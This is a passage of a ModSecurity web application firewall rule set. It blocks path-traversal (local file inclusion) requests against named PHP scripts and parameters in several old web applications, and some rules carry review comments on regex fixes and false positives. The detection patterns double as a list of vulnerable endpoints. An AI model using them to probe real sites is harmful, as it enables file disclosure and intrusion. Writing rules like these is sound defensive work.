# (2009332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion
# Three-link chain: the request line must contain
# "/resource_categories_view.php" and "GET ", and the CLASSES_ROOT argument must
# contain "../". Only requests whose request line contains "GET " are examined.
SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009332,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:CLASSES_ROOT "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file
inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009396,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Tipo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /modules/core/security/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009461,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009462) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage1.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009462,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage4.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009463,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage6.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009464,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /website.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009743,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30176'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:page "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpDatingClub website.php page Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion SecRule REQUEST_LINE "@contains 
/chat/dac.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009390,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34213'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:sendChatData "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion SecRule REQUEST_LINE "@contains /message_class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009168,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33718'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pfadhier "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter 
Local File Inclusion SecRule REQUEST_LINE "@contains /passwiki.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008687,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29455'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /footer.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009659,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[footer] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009660,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28421'" SecRule REQUEST_LINE 
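"@contains GET " "chain"
    SecRule ARGS:settings[header] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion
# Three-link chain: the request line must contain "functions_navlinks.php" and
# "GET ", and at least one TX variable must exist whose name matches the
# selector DIR_TRAVERSAL.*ARGS:pun_user.language.
# The text between the slashes is a regular expression. Written as
# "pun_user[language]" the brackets form a character class, which cannot match
# the literal "[" that follows "pun_user" in the argument name, so the count
# stayed at 0 and the chain could not complete. "." stands in for each bracket
# so the selector matches "pun_user[language]" without needing backslash
# escapes inside the quoted selector.
# Depends on an earlier rule having stored a DIR_TRAVERSAL TX variable for this
# argument (presumably named like the setvar below); confirm that rule is
# enabled and evaluated before this one.
# NOTE(review): the match string is lower-case while the message spells the file
# "Functions_navlinks.php"; @contains is case-sensitive and no t:lowercase is
# listed - confirm which spelling the application uses.
SecRule REQUEST_LINE "@contains functions_navlinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user.language./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB Functions_navlinks.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion
# Same shape as 2008880 for "profile_send.php"; the TX selector carries the same
# bracket fix ("." in place of "[" and "]").
SecRule REQUEST_LINE "@contains profile_send.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user.language./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB profile_send.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion
# Same shape as 2008880 for "viewtopic_PM-link.php"; the TX selector carries the
# same bracket fix.
SecRule REQUEST_LINE "@contains viewtopic_PM-link.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008882,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32360'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pun_user.language./' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PunBB viewtopic_PM-link.php pun_user language Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion
# Three-link chain: the request line must contain "/server_request.php" and
# "GET ", and the argument CONFIG[gameroot] must contain "../". Here the
# brackets sit in a plain ARGS name, not in a /regex/ selector, so they are
# taken literally.
SecRule REQUEST_LINE "@contains /server_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009503,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library server_request.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009505) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter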
Local File Inclusion SecRule REQUEST_LINE "@contains /qlib/smarty.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009505,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,27945'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:CONFIG[gameroot] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Quantum Game Library smarty.inc.php CONFIG Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009746) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /qte_web.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009746,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:qte_web_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /bin/qte_init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009724,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " 
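"chain"
    SecRule ARGS:qte_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS QuickTeam qte_init.php qte_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure
# Three-link chain: the request line must contain "/download.php" and "GET ",
# and at least one TX variable must exist whose name matches
# DIR_TRAVERSAL.*ARGS:filename.
# Depends on an earlier rule having stored a DIR_TRAVERSAL TX variable for the
# argument; confirm that rule is enabled and evaluated before this one.
# NOTE(review): the selector is an unanchored regular expression and
# "/download.php" is a common script name, so other applications and longer
# argument names that begin with "filename" can also satisfy this chain - watch
# for false positives at the critical anomaly score.
SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009018,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:filename/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Text Lines Rearrange Script filename parameter File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure
# Three-link chain: the request line must contain "GET " and
# "main.php?action=download", and at least one TX variable must exist whose name
# matches DIR_TRAVERSAL.*ARGS:id.
# The selector previously read ARGS:&id. ModSecurity names the argument ARGS:id,
# so a selector that requires a literal "&" before "id" would not match a TX
# variable recorded for that argument and the chain could not complete. The "&"
# looks like a leftover of the query-string separator - TODO confirm against the
# upstream signature.
# Depends on an earlier rule having stored a DIR_TRAVERSAL TX variable for the
# argument; confirm that rule is enabled and evaluated before this one.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/6715'"
    SecRule REQUEST_LINE "@contains main.php?action=download" "chain"
    SecRule &TX:'/DIR_TRAVERSAL.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptsEz Easy Image Downloader id File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter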
local file inclusion SecRule REQUEST_LINE "@contains /login.tpl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009070,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,33092'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:TplSuffix "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpSkelSite TplSuffix parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /vars.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009181,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:_SESSION[SCRIPT_PATH] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster vars.inc.php _SESSION Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pcltar.lib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009182,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
ARGS:g_pcltar_lib_dir "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SnippetMaster pcltar.lib.php g_pcltar_lib_dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /preview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009145,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33601'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:synTarget "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Syntax Desktop preview.php synTarget Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion SecRule REQUEST_LINE "@contains /body_default.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009230,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2009-0441'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:shop_this_skin_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TECHNOTE shop_this_skin_path Paramter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
